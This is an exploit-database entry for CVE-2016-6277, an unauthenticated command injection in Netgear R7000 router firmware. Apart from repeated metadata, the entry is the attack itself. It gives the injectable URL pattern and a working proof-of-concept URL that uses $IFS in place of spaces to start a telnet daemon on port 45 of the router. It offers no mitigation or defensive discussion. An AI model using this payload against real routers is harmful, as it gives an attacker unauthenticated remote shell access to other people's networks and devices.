Netgear R7000 - Command Injection
| EKU-ID: 45128 | CVE: CVE-2016-6277 | OSVDB-ID: |
| Author: Acew0rm | Published: 2016-12-07 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 45128 | CVE: CVE-2016-6277 | OSVDB-ID: |
| Author: Acew0rm | Published: 2016-12-07 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: Netgear R7000 - Command Injection # Date: 6-12-2016 # Exploit Author: Acew0rm # Contact: https://twitter.com/Acew0rm1 # Vendor Homepage: https://www.netgear.com/ # Category: Hardware # Version: V1.0.7.2_1.1.93 -Vulnerability An unauthenticated user can inject commands threw http://RouterIP/cgi-bin/;COMMAND. -Proof Of Concept http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.